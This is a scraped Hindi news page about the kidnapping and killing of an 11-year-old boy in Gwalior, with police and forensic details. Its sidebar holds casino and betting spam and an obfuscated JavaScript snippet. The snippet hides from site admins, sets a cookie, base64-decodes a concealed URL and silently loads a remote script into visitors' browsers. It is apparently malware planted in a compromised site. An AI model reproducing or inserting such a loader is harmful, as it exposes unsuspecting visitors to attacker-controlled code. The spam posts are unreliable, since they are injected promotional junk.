ग्वालियर में 11 साल के बच्चे का किडनैप कर हत्या:पहचान छुपाने के लिए पत्थर से चेहरा कुचल डाला,

- Advertisement -
- Advertisement -

ग्वालियर राष्ट्र आजकल प्रतिनिधि । गिरवाई के वीरपुर बांध इलाके में रहने वाले 11 साल के बच्चे की अपहरण के बाद हत्या का मामला सामने आया है। मासूम का शव अजयपुर पहाड़ी पर मिला है। गांववाले ने शव देखकर पुलिस को सूचना दी। जांच में खुलासा हुआ कि बच्चे की पहचान न हो इसलिए अपराधियों ने उसके चेहरे को पत्थर से कुचल दिया और फिर शव को पहाड़ी पर ही एक गड्ढे में दफना कर ऊपर से पत्थर रख दिया। घटना की सूचना के बाद मौके पर पहुंची पुलिस जांच पड़ताल में जुट गई है। मौके पर फॉरेंसिक टीम को भी बुलाया गया है। बताया जा रहा है कि बच्चे को आखिरी बार किसी बाइक वाले के पास खड़े देखा गया था। पुलिस उसकी तलाश कर रही है। हत्या का कारणों का भी पता नहीं चल सकता है।

वीरपुर बांध इलाके में रहने वाला राजेन्द्र उर्फ कल्याण सिंह प्राइवेट कंपनी में काम करता है। परिवार में पत्नी के अलावा दो बच्चे हैं। बड़ा बेटा 11 साल का अमित बघेल पास ही के स्कूल में कक्षा 2 का छात्र था। बुधवार दोपहर 2 बजे अमित घर से कुरकुरे लेने के लिए निकला था। इसके बाद वह वापस नहीं लौटा। देर शाम तक बच्चा वापस नहीं आया, तो परिजनों ने तलाश शुरू की, लेकिन उसका पता नहीं चला। इसके बाद उन्होंने मामले की सूचना गिरवाई थाने में दी। पुलिस ने मामले की गंभीरता को समझते हुए अपहरण का मामला दर्ज किया। पुलिस ने अपने स्तर पर पड़ताल शुरू की।

22 घंटे बाद मिली खबर, बच्चे का शव पड़ा है

लापता होने के 22 घंटे के बाद गुरुवार दोपहर 12 बजे पुलिस को गांव वाले ने सूचना दी कि अजयपुर की पहाड़ी पर गड्‌ढे में शव पड़ा है। ऊपर से भारी पत्थर रखे हैं। इस पर SP अमित सांघी, CSP लश्कर आत्माराम शर्मा, थाना प्रभारी गिरवाई सब इंस्पेक्टर रघुवीर मीणा फोर्स के साथ स्पॉट पर पहुंचे। यहां शव को निगरानी में लेकर पड़ताल शुरू की। मृतक की पहचान 11 साल के अमित के रूप में होने के बाद तत्काल फोरेंसिक एक्सपर्ट अखिलेश भार्गव को बुलाया गया।

कब्रिस्तान में बेरहमी से की गई है हत्या

एक्सपर्ट के मुताबिक पहले बच्चे के सिर पर पत्थर से वार किया गया है। इसके बाद उसके ऊपर कपड़े की दरी डाली गई है फिर भारी पत्थर से कुचल गया है। इसके बाद गड्‌ढे में दफनाया गया है। उसका चड्ढा आधा उतरा हुआ है, लेकिन अंडर गारमेंट्स सही है। दुष्कृत्य की आशंका से इनकार नहीं किया जा सकता। जिस जगह हत्या कर दफनाया गया है, वह कब्रिस्तान है। उस पहाड़ी पर आसपास और भी शव दफनाए जाते हैं, इसलिए वहां दिन और रात के समय कोई आता-जाता नहीं है।

बाइक वाले पर संदेह

मृतक के परिजन ने पुलिस को बताया कि पड़ोसियों ने उन्हें बताया था कि जहां पर बच्चे खेल रहे थे, वहां काफी देर से एक बाइक सवार खड़ा था। उसकी बाइक पर डलिया बंधी थी। जब वह वहां से जा रहा था, तो डलिया पर कपड़ा पड़ा था। पड़ोसियों ने उसे रोकने का प्रयास किया, तो वह बाइक लेकर भाग गया। संदेह है कि बच्चे को उक्त बाइक सवार ही ले गया है। पुलिस भी बाइक सवार की तलाश कर रही है।

हर एंगल पर जांच कर रहे हैं

एसपी अमित सांघी के मुताबिक हत्या का कारण फिलहाल पता नहीं है। हत्या करने वाला भी अज्ञात है। पुलिस हर एंगल पर जांच कर रही है। गिरवाई थाना और क्राइम ब्रांच की टीमें जांच कर रही हैं।

- Advertisement -

Latest news

Анализ виртуального игорного заведения: официальный портал и слоты

Анализ виртуального игорного заведения: официальный портал и слоты Игроки, ищущие доверенное виртуальное казино, зачастую обращают внимание на официальный сайт как на визитную карточку заведения. Необходимо,...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

Best On The Web Casinos Australia: Best Aussie Real Cash Sites 2025″

10 Best Genuine Money Online Casinos In Australia September 2025ContentChoose Your Own Game And Start Off PlayingTop 10 Australian On The Internet CasinosHow We...

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();

Mostbet AZ – bukmeker ve kazino Mostbet Giri rsmi sayt.9201

Mostbet AZ - bukmeker ve kazino Mostbet - Giriş rəsmi sayt ...

Mostbet зеркало рабочее – Вход на официальный сайт Мостбет.1252

Mostbet зеркало рабочее - Вход на официальный сайт Мостбет ...
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here